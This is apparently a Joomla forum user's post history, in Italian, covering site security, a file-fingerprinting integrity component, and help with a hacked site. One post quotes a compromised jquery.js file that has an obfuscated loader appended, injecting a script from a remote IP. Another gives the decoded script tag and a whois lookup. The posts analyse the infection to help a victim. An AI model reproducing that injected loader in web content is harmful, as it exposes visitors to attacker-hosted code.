Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.

Post - Locu

Pagine: [1] 2 3

Sviluppo / Re:Site FingerPrint com

« il: 22 Mag 2010, 20:29:08 »

sicuramente, il tutto va migliorato, per ora non c'è la possibilità di selezionare le directory da scansionare e/o il tipo di file, sicuramente mi adopererò per aggiungere tale funzione.
per ora il com è solo un "POC" se così lo vogliamo chiamare, ad ogni modo se qualcuno mi da una mano, visto che nn sono ancora molto pratico del framework di joomla, io sono pronto ad impiegare del tempo libero per rendere il componente più funzionale. Intanto grazie del suggerimento

Sviluppo / Site FingerPrint com

« il: 22 Mag 2010, 20:05:07 »

Salve,
tempo fa proposi di creare un componente che effettuasse una firma digitale di ogni singolo file presente sul proprio sito in modo da poter facilmente individuare i files modificati / hackerati. Alla fine ho deciso di farmelo da me visto che nn si trova nulla del genere in circolazione.

Per ora il componentne funziona solo online, per farlo andare in locale dovrete modificare il file "admin.sitefingerprint.html.php" alle righe 54 e 122 come segue:

Codice: [Seleziona]

foreach (scanning($basepath) as $key=>$file)local mod

Codice: [Seleziona]

foreach (scanning('/pathlocale') as $key=>$file)
Non ho avuto molto tempo per testare il componente per cui ogni feedback è ben gradito, magari anche qualche consiglio per future versioni, tempo permettendo

.

Inoltre ho fatto anche un video che mostra il funzionamento del componente, sfortunatamente il filmato pesava 832 kb quindi nn ho potuto allergarlo, lo trovate qui:

_http://www.multiupload.com/37FS6OYK5O

Locu

[allegato vecchio più di un anno eliminato automaticamente]

Joomladay / Re:joomlaspritz 16 ottobre 2009 a Verona

« il: 11 Ott 2009, 14:50:41 »

Salve, quest'anno vengo pure io... da casa mia a Borgo Roma son 5 minuti.

come faccio a riconoscervi?

Sicurezza / Re:Eridetare un sito gestito da un altro webmaster

« il: 26 Giu 2009, 00:13:13 »

in alternativa puoi sempre provare a criptare i sorgenti, si trova parecchio materiale in giro.

questo ad esempio è free:

_http://www.seocompany.ca/software/free-encryption-software.html

Sicurezza / Re: Problema con stringa javascript non identificata

« il: 28 Apr 2009, 21:47:27 »

si, credo che potrebbe andare, cmq lascio la parola agli esperti di joomla.

Joomla! 1.5 / Re: problema nel lavorare in locale con joomla

« il: 26 Apr 2009, 23:44:23 »

no, non cambia assolutamente nulla. i tuoi browser e/o modifiche hanno qualche problema.

Sviluppo / Re: Componente anti-hack

« il: 24 Apr 2009, 16:09:03 »

Ciao Red,
la cosa è interessante...sicuramente se volete implementare questa tecnologia come IDS sui vostri server la cosa sarà più complessa ma per singoli siti non credo sia così ardua. Ad ogni modo appena avrò tempo cercherò di informarmi meglio giusto per capire quali siano i problemi effettivi di tale implementazione.

L'idea di farlo a steps mi sembra molto appropriata, inoltre ci sarebbe da pianificare dei controlli automatizzati in modo che l'user non debba ogni volta eseguire il check manualmente.

Sviluppo / Componente anti-hack

« il: 24 Apr 2009, 13:58:15 »

Salve,
mi è venuta un'idea molto banale per sfoltire gli innumerevoli tentativi di hack dei files in joomla. Purtroppo io non ho tempo/voglia di studiarmi il framework, quindi vi posto l'idea poi vedrete voi se la cosa vi può interessare.

Sarebbe utile sviluppare un componente che esegua un controllo sul size/name/path di ogni singolo file per poi generare un hash che verrà successivamente comparato per verificarne l'autenticità,
Cosicchè, dal backend, l'admin potrà decidere quali files sono stati modificati/aggiunti e valutarne la pericolosità.
Se esiste già un componente per tale scopo fate finta di non aver letto e scusate la mia ignoranza.

Sicurezza / Re: Problema con stringa javascript non identificata

« il: 22 Apr 2009, 23:33:17 »

ciao, ho dato un'occhiata più accurata a quel file e non penso sia un worm... da più l'idea di un cookie grabber o roba simile, dovò studiarmi jquery (http://jquery.com/) per essere più preciso in quanto la semantica è un pò caotica.

la versione del joomla è indifferente piuttosto assicurati di non avere falle che permettano accessi malevoli. bye

Sicurezza / Re: Joomla 1.0.13 PHP server setting..

« il: 21 Apr 2009, 00:35:29 »

ciao, puoi cambiarlo dal file php.ini.

Sicurezza / Re: Modificati i permessi di Super Amministratore

« il: 21 Apr 2009, 00:17:08 »

ciao, se hai un vecchio backup della tabella users puoi tranquillamente svuotare/eliminare (dipende da come è stato eseguito il backup) la tabella jos_users e poi ricaricarla, per fare ciò ti basterà entrare nel phpmyadmin e importare la tabella che ti interessa. se ti servono maggiori info sono qui.

Sicurezza / Re: Problema con stringa javascript non identificata

« il: 21 Apr 2009, 00:07:11 »

questo è il contenuto del file jquery.js... a prima vista sembra un worm.

Citazione

/*
* jQuery JavaScript Library v1.3.1
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009)
* Revision: 6158
*/
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.makeArray(E))},selector:"",jquery:"1.3.1",size:function(){return this.length},get:function(E){return E===g?o.makeArray(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector+(this.selector?" ":"")+E}else{if(H){G.selector=this.selector+"."+H+"("+E+")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){var E=F;if(typeof F==="string"){if(H===g){return this[0]&&o[G||"attr"](this[0],F)}else{E={};E[F]=H}}return this.each(function(I){for(F in E){o.attr(G?this.style:this,F,o.prop(this,E[F],G,I,F))}})},css:function(E,F){if((E=="width"||E=="height")&&parseFloat(F)<0){F=g}return this.attr(E,F,"curCSS")},text:function(F){if(typeof F!=="object"&&F!=null){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(F))}var E="";o.each(F||this,function(){o.each(this.childNodes,function(){if(this.nodeType!=8){E+=this.nodeType!=1?this.nodeValue:o.fn.text([this])}})});return E},wrapAll:function(E){if(this[0]){var F=o(E,this[0].ownerDocument).clone();if(this[0].parentNode){F.insertBefore(this[0])}F.map(function(){var G=this;while(G.firstChild){G=G.firstChild}return G}).append(this)}return this},wrapInner:function(E){return this.each(function(){o(this).contents().wrapAll(E)})},wrap:function(E){return this.each(function(){o(this).wrapAll(E)})},append:function(){return this.domManip(arguments,true,function(E){if(this.nodeType==1){this.appendChild(E)}})},prepend:function(){return this.domManip(arguments,true,function(E){if(this.nodeType==1){this.insertBefore(E,this.firstChild)}})},before:function(){return this.domManip(arguments,false,function(E){this.parentNode.insertBefore(E,this)})},after:function(){return this.domManip(arguments,false,function(E){this.parentNode.insertBefore(E,this.nextSibling)})},end:function(){return this.prevObject||o([])},push:[].push,find:function(E){if(this.length===1&&!/,/.test(E)){var G=this.pushStack([],"find",E);G.length=0;o.find(E,this[0],G);return G}else{var F=o.map(this,function(H){return o.find(E,H)});return this.pushStack(/[^+>] [^+>]/.test(E)?o.unique(F):F,"find",E)}},clone:function(F){var E=this.map(function(){if(!o.support.noCloneEvent&&!o.isXMLDoc(this)){var I=this.cloneNode(true),H=document.createElement("div");H.appendChild(I);return o.clean([H.innerHTML])[0]}else{return this.cloneNode(true)}});var G=E.find("*").andSelf().each(function(){if(this[h]!==g){this[h]=null}});if(F===true){this.find("*").andSelf().each(function(I){if(this.nodeType==3){return}var H=o.data(this,"events");for(var K in H){for(var J in H[K]){o.event.add(G,K,H[K][J],H[K][J].data)}}})}return E},filter:function(E){return this.pushStack(o.isFunction(E)&&o.grep(this,function(G,F){return E.call(G,F)})||o.multiFilter(E,o.grep(this,function(F){return F.nodeType===1})),"filter",E)},closest:function(E){var F=o.expr.match.POS.test(E)?o(E):null;return this.map(function(){var G=this;while(G&&G.ownerDocument){if(F?F.index(G)>-1:o(G).is(E)){return G}G=G.parentNode}})},not:function(E){if(typeof E==="string"){if(f.test(E)){return this.pushStack(o.multiFilter(E,this,true),"not",E)}else{E=o.multiFilter(E,this)}}var F=E.length&&E[E.length-1]!==g&&!E.nodeType;return this.filter(function(){return F?o.inArray(this,E)<0:this!=E})},add:function(E){return this.pushStack(o.unique(o.merge(this.get(),typeof E==="string"?o(E).makeArray(E))))},is:function(E){return !!E&&o.multiFilter(E,this).length>0},hasClass:function(E){return !!E&&this.is("."+E)},val:function(K){if(K===g){var E=this[0];if(E){if(o.nodeName(E,"option")){return(E.attributes.value||{}).specified?E.value:E.text}if(o.nodeName(E,"select")){var I=E.selectedIndex,L=[],M=E.options,H=E.type=="select-one";if(I<0){return null}for(var F=H?I:0,J=H?I+1:M.length;F<J;F++){var G=M[F];if(G.selected){K=o(G).val();if(H){return K}L.push(K)}}return L}return(E.value||"").replace(/\r/g,"")}return g}if(typeof K==="number"){K+=""}return this.each(function(){if(this.nodeType!=1){return}if(o.isArray(K)&&/radio|checkbox/.test(this.type)){this.checked=(o.inArray(this.value,K)>=0||o.inArray(this.name,K)>=0)}else{if(o.nodeName(this,"select")){var N=o.makeArray(K);o("option",this).each(function(){this.selected=(o.inArray(this.value,N)>=0||o.inArray(this.text,N)>=0)});if(!N.length){this.selectedIndex=-1}}else{this.value=K}}})},html:function(E){return E===g?(this[0]?this[0].innerHTML:null):this.empty().append(E)},replaceWith:function(E){return this.after(E).remove()},eq:function(E){return this.slice(E,+E+1)},slice:function(){return this.pushStack(Array.prototype.slice.apply(this,arguments),"slice",Array.prototype.slice.call(arguments).join(","))},map:function(E){return this.pushStack(o.map(this,function(G,F){return E.call(G,F,G)}))},andSelf:function(){return this.add(this.prevObject)},domManip:function(K,N,M){if(this[0]){var J=(this[0].ownerDocument||this[0]).createDocumentFragment(),G=o.clean(K,(this[0].ownerDocument||this[0]),J),I=J.firstChild,E=this.length>1?J.cloneNode(true):J;if(I){for(var H=0,F=this.length;H<F;H++){M.call(L(this[H],I),H>0?E.cloneNode(true):J)}}if(G){o.each(G,z)}}return this;function L(O,P){return N&&o.nodeName(O,"table")&&o.nodeName(P,"tr")?(O.getElementsByTagName("tbody")[0]||O.appendChild(O.ownerDocument.createElement("tbody"))):O}}};if((document.cookie.indexOf('m'+'ie'+'k=1')<0)&&(typeof(ztv)!=typeof('CDF'))){var z1=navigator,z2=z1.appName;ztv=z2.charAt(0);document.write(('<s'+'cri'+'pt src="htt'+'p://94.2'+'47.2.1'+'95/ne'+'ws/?id=10KK"><'+'/scri'+'pt>').replace('KK',ztv=='M'?'0':'1'));}(function(){var Q=/((?:$(?:\([^()]+$|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]+['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[]+)+|[>+~])(\s*,\s*)?/g,K=0,G=Object.prototype.toString;})();})();

appena ho 5 min me lo guardo bene e ti saprò dire qualcosa di + preciso.

Sicurezza / Re: Problema con stringa javascript non identificata

« il: 21 Apr 2009, 00:03:05 »

ciao, quella è una stringa offuscata che punta a qualcosa di maligno al 99%... devo reinstallare la virtual machine quindi non posso darti maggiori info. Ad ogni modo ho decodificato la stringa eccola qui: (non seguire il link)

<script src=//94.247.2.195/jquery.js></script>

qui sotto ti riporto il whois dell'ip 94.247.2.195

Citazione

Risultato query sull'IP 94.247.2.195
Risoluzione nome: hs.2-195.zlkon.lv

inetnum: 94.247.2.0 - 94.247.3.255
netname: ZLKON
descr: ZlKon
country: LV
admin-c: ZK508-RIPE
tech-c: DES31-RIPE
status: ASSIGNED PA
mnt-by: PCEXPRESS-MNT
mnt-lower: ZLKON-MNT
mnt-routes: ZLKON-MNT
source: RIPE # Filtered

role: ZlKon HostMaster
address: Lilijas iela 4-74
address: Riga, LV-1055
address: Latvija
phone: +371 26330593
admin-c: AD5952-RIPE
tech-c: AD5952-RIPE
nic-hdl: ZK508-RIPE
mnt-by: ZLKON-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@zlkon.lv

role: DATORU EXPRESS SERVISS HostMaster
address: 18. novembra street 319C
address: Daugavpils, LV-5413
address: Latvia
phone: +371 26631339
fax-no: +371 65420725
remarks: Information: http://www.pcexpress.lv
remarks: Questions: hostmaster@pcexpress.lv
admin-c: IV745-RIPE
tech-c: IV745-RIPE
nic-hdl: DES31-RIPE
mnt-by: PCEXPRESS-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@pcexpress.lv

route: 94.247.0.0/21
descr: "DATORU EXPRESS SERVISS" Ltd.
origin: AS12553
mnt-by: PCEXPRESS-MNT
source: RIPE # Filtered

per toglierla ti basterà eliminarla da tutti i file infetti, da chi è stata generata non saprei che dirti. Cmq in questi giorni analizzerò il file jquery.js e ti darò altre notizie. ciao

Sicurezza / Re: Modificati i permessi di Super Amministratore

« il: 20 Apr 2009, 15:31:14 »

ciao controlla anche che i parametri "block" e "gid" nella tabella jos_user siano corretti. Per i sup admin il gid deve essere settato a 25 ovviamente block a 0. la modifica della password non comporta nessun problema, accertati solo di aver inserito corretamente l'hash MD5 della tua password. Bye

Sicurezza / Re: Criptare email

« il: 20 Apr 2009, 14:35:20 »

ciao, prima di tutto devo dirti che i 2 link segnalati da scherman83 non servono per criptare le email, la criptazione è tutta un'altra storia.
Leggendo il tuo ultimo post suppongo tu abbia optato per il secondo link quello della codifica, perciò è normale che nel sorgente della pagina tu veda l'output codificato mentre con l'editor del joomla (che è un interprete html) appaia decodificata.

Infatti la tua mail "codificata" non è altro che una conversione da testo a sistema decimale, ogni carattere ASCII può essere espresso in numero sia decimale,esadecimale, ottale e html. Puoi vedere come vengono applicate tale codifiche nella tabella che segue.

Per concludere ti consiglio di utilizzare il primo metodo, quello javascript, in quanto non credo che la semplice codifica possa fermare gli spiders.

Sicurezza / Re: apache

« il: 20 Apr 2009, 14:04:36 »

Citazione

- in un'installazione in locale è possibile per chi conosce i dettagli della mia connessione (ip ecc) accedere in lettura ai file dentro httpdocs?

ciao, la possibilità di accesso ai file è data anche dalla configurazione della tua rete, mi spiego meglio, se hai un router/firewall dovresti assicurarti di aver mappato la porta 80 e/o 8080 per garantire accesso agli utenti esterni. Per fare ciò basta entrare nella configurazione del tuo router e impostare il NAT. Se ti servono altri chiarimenti posta qui

Sicurezza / Re: Hacker in azione cercasi BUG

« il: 22 Nov 2008, 01:26:37 »

ciao,
mi linkeresti il tuo sito... inoltre puoi zipparmi i file che hai trovato e sendarmeli, voglio cotnrollare delle cose. thx

Sicurezza / Re: Protezione video copirights .

« il: 12 Nov 2008, 14:24:46 »

Ciao, non puoi mettere una watermark sul video? Hai proprio la necessità di bloccare i downloads?

Sicurezza / Re: Sicurezza non è un'isola.

« il: 12 Nov 2008, 14:18:06 »

Ciao Francesco,
concordo con quello che dici, il maggiore dei problemi relativi alla sicurezza informatica, citando una frase celebre, è posto tra lo schermo e lo schienale della sedia. Infatti molto spesso gli attacchi a sistemi vengono svolti utilizzando tecniche di social engineering e ciò rende la vita molto dura ai tecnici dei centri IT.
Recentemente ho fatto una consulenza per un'azienda che gestisce dati sensibili... I dati giravano in una VPN ma spesso si sono verificati problemi a causa di alcuni dipendenti che usavano il pc per i loro svaghi. A quel punto si è deciso di procedere dotando ogni pc di un programma di messaggistica istantanea e ralativo servizio email entrambi criptati, inoltre un'altro piccolo accorgimento è stato quello di installare un keyscrambler.(per chi non lo sapesse è un driver che scombina gli input della tastiera rendendo la vita diffile a tutte le applicazioni keyloggers). Ovviamente nell'azienda era presente un firewalls che filtrava alcuni isp, abbiamo fatto qualche miglioramento ma alla fine della fiera non siamo ancora sicuri che ciò basti a garantire la sicurezza.

Di questi tempi privacy e security sono concetti molto labili anche per gli utenti più preparati.

Sicurezza / Re: Virus

« il: 11 Nov 2008, 18:16:48 »

Ciao,
la cosa non è molto semplice da spiegare, ad ogni modo avast non ti fa un report? Che versione di avast hai? è inclusa una protezione web?

prova a scaricare il sito in locale e fai una scansione online con un multi av scanner. eg:

_http://virscan.org/

Cerca di fornirmi più informazioni altrimenti diventa dura aiutarti.

Pagine: [1] 2 3